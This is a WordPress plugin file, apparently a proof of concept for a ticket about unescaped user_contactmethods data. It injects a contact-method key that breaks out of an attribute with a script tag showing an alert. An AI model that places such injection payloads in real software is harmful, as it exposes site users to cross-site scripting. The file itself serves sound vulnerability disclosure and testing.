1 | <?php |
---|
2 | /****************************************************************************** |
---|
3 | Plugin Name: PoC ticket 43723 |
---|
4 | Plugin URI: https://burobjorn.nl |
---|
5 | Description: PoC shows not user_contactmethods data is not properly escaped |
---|
6 | Version: 1.0 |
---|
7 | Author: Bjorn Wijers <burobjorn at burobjorn dot nl> |
---|
8 | Author URI: https://burobjorn.nl |
---|
9 | License: GPLv2 or later |
---|
10 | ******************************************************************************/ |
---|
11 | |
---|
12 | if( ! function_exists('poc_43723') ) { |
---|
13 | function poc_43723( $methods ) { |
---|
14 | if( is_array( $methods) ) { |
---|
15 | $unsafe_data = array('test"><script>alert(\'If you can read this, data was not properly escaped\');</script>' => 'PoC-43723' ); |
---|
16 | return array_merge( $methods, $unsafe_data); |
---|
17 | } |
---|
18 | return $methods; |
---|
19 | } |
---|
20 | add_filter('user_contactmethods', 'poc_43723'); |
---|
21 | } |
---|
22 | ?> |
---|